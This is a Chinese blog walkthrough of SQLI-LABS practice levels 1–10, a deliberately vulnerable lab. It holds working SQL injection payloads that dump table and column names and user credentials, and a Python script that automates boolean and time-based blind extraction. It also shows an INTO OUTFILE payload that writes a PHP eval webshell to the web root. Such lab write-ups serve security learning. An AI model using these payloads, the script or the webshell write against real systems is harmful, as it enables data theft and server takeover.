SQLI-LABS Page1 1-10

最新推荐文章于 2022-11-12 20:09:39 发布

影子019

最新推荐文章于 2022-11-12 20:09:39 发布

阅读量334

点赞数

分类专栏： sql注入文章标签：网络安全 sql注入

本文链接：https://blog.csdn.net/qinying001/article/details/107605990

版权

sql注入专栏收录该内容

2 篇文章 0 订阅

订阅专栏

文章目录

Less-1 字符报错注入

在这里插入图片描述

简单报错注入，分号检测
payload:

http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+ 
检测字段数，字段为3
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+
查看用户：sqli@localhost
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+
查看数据库：security
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查看表名：users,emails,uagents,referers
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(column_name),3 from information_schema.columns where table_name='users' --+
查看列名：id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(id),group_concat(username) from users--+
查看表信息

在这里插入图片描述

Less-2 数字报错注入

在这里插入图片描述

测试注入：
http://192.168.44.139/sqli-labs/Less-2/?id=1 and 1=2

剩下的和语句和less1一样，去掉数字后面的分号即可

Less-3

在这里插入图片描述
根据报错信息，引号后面还有一个括号，注入则改成2')，其余一样。

Less-4

2")注入双引号

Less-5 字符盲注

判断数据库长度：
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or (length(database()))>3 --+
判断数据库名：(字母逐个判断)
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or ascii(substr(database(),1,1))>1 --+
................................

自动化注入，贴一个小脚本：

import requests

url = "http://192.168.44.139/sqli-labs/Less-5/?id=-1"
_columns = []
_tables = []
_database = ""

def binarySearch(payload):
	maxn = 144
	minn = 1
	while minn<=maxn:
		middle = (maxn+minn)//2
		payload1 = payload+">"+str(middle)+"--+"
		#print(payload1)
		r = requests.get(payload1)
		if "You are in" in r.text:
			minn = middle+1
		else:
			maxn = middle-1
	return minn

def getLength(func):
	payload1 = url+"' or length({})".format(func)
	return binarySearch(payload1)

def getStr(func, length):
	mstr = ""
	for i in range(1,length+1):
		payload = url+"' or ascii(substr({},{},1))".format(func,i)
		tmp = binarySearch(payload)
		mstr += chr(tmp)
		#print(mstr)
	return mstr
def getDatabase():
	global _database
	func = "database()"
	result = getStr(func, getLength(func))
	print("[*] database: "+result)
	_database = result

def getTaleNUM(database):
	func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database)
	length = getLength(func)
	print(length)
	result = getStr(func, length)
	print("[*] table num ="+result)

def getTales(database):
	global _tables
	func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database)
	length = getLength(func)
	result = getStr(func, length)
	_tables = result.split(',')
	print("[*] tables: "+result)

def getColumns(table, database):
	global _columns
	func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database)
	length = getLength(func)
	#print(length)
	result = getStr(func, length)
	_columns = result.split(",")
	print("[*] columns from {}:".format(table)+result)

def getInformation(table, column):
	Info = {}
	for i in column:
		func = "(select group_concat({}) from {})".format(i, table)
		length = getLength(func)
		#print(length)
		result = getStr(func, length)
		Info[i] = result.split(',')
		#print(result)
		#print(Info[i])
	for i in range(len(Info[column[0]])):
		mstr = ""
		for j in column:
			mstr += Info[j][i]
			mstr += "   "
		print(mstr)


if __name__ == "__main__":
	getDatabase()
	getTales(_database)
	getColumns(_tables[0],_database)
	getInformation(_tables[0], _columns)

Less-6

将第五关的单引号改为双引号

Less-7 文件写入注入

写入shell，注意权限
http://192.168.44.139/sqli-labs/Less-7/?id=-1')) union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile '/var/www/html/a.txt' --+
写入之前可以先使用@@datadir查看服务器系统类型，尝试猜web得绝对路径

Less-8

盲注。可用第五关脚本

Less-9 时间盲注

盲注，虽然题目为时间盲注，但是可以根据返回数据长度来进行bool盲注，更改第五关脚本的binarySearch函数即可

#LEN为正常返回时的长度，当id不存在时，长度会变化
LEN = len(requests.get("http://192.168.44.214/sqli-labs/Less-9/?id=1").text)
def binarySearch(payload):
    maxn = 144
    minn = 1
    while minn<=maxn:
        middle = (maxn+minn)//2
        payload1 = payload+">"+str(middle)+"--+"
        #print(payload1)
        r = requests.get(payload1)
        #print(len(r.text))
        if len(r.text) == LEN:
            minn = middle+1
        else:
            maxn = middle-1
    return minn

时间盲注，修改函数：

def timeout(url):
    try:
        r = requests.get(url, timeout=2)
        return 0
    except:
        return 1

def binarySearch(payload):
    maxn = 144
    minn = 1
    while minn<=maxn:
        middle = (maxn+minn)//2
        payload1 = payload+">"+str(middle)+"--+"
        tmp = re.split(" or |--", payload1)
        #睡眠时间可根据需要调整
        payload2 = tmp[0]+"or"+" if("+tmp[1]+",sleep(0.5),1)"+" --+"
        # print(payload2)
        if timeout(payload2):
            minn = middle+1
        else:
            maxn = middle-1
    return minn

Less-10

和Less-9注入方式一样，将分界符'更改为"即可

影子019

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
SQLI-LABS Page1 1-10

0x01 Less-1 字符报错注入简单报错注入，分号检测payload:http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+ 检测字段数，字段为3http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+查看用户：sqli@localhosthttp://192.168.44.139/sqli-labs/Less-
复制链接

扫一扫